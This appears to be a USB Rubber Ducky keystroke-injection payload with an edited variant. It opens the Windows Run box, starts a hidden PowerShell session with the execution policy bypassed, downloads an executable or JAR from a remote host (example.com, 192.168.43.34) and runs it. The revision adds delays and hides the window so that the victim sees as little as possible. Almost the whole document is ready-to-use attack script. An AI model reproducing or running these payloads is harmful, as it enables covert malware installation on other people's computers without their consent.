66 lines
2.3 KiB
Plaintext
66 lines
2.3 KiB
Plaintext
Powershell Wget + Execute
|
|
|
|
Author: mubix
|
|
Duckencoder: 1.3
|
|
Target: Windows 7
|
|
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
|
GUI r
|
|
DELAY 100
|
|
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
|
|
ENTER
|
|
|
|
Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand.
|
|
|
|
|
|
|
|
Edited by: Fahad Alkamli
|
|
This is an improved version for the code above.
|
|
In my opinion the user should see as minimum as possible so writing a whole line of code in the run is not discreet.
|
|
|
|
```
|
|
REM You can remove this Delay line in the beginning (I just rather having it just in case)
|
|
DELAY 60000
|
|
REM open the Run
|
|
GUI r
|
|
REM Change this value depending on the computer you are using ( i mean slow or not )
|
|
DELAY 100
|
|
STRING powershell -windowstyle hidden
|
|
ENTER
|
|
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
|
|
DELAY 1000
|
|
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
|
|
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
|
|
STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination;
|
|
ENTER
|
|
DELAY 5000
|
|
STRING start-process FileName.EXE
|
|
ENTER
|
|
DELAY 100
|
|
STRING exit
|
|
ENTER
|
|
```
|
|
Full Example with Jar:
|
|
```
|
|
REM You can remove this Delay line in the beginning (I just rather having it just in case)
|
|
DELAY 60000
|
|
REM open the Run
|
|
GUI r
|
|
REM Change this value depending on the computer you are using ( i mean slow or not )
|
|
DELAY 100
|
|
STRING powershell -windowstyle hidden
|
|
ENTER
|
|
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
|
|
DELAY 1000
|
|
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
|
|
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
|
|
STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination;
|
|
ENTER
|
|
DELAY 5000
|
|
STRING start-process Service.jar
|
|
ENTER
|
|
DELAY 100
|
|
STRING exit
|
|
ENTER
|
|
```
|
|
|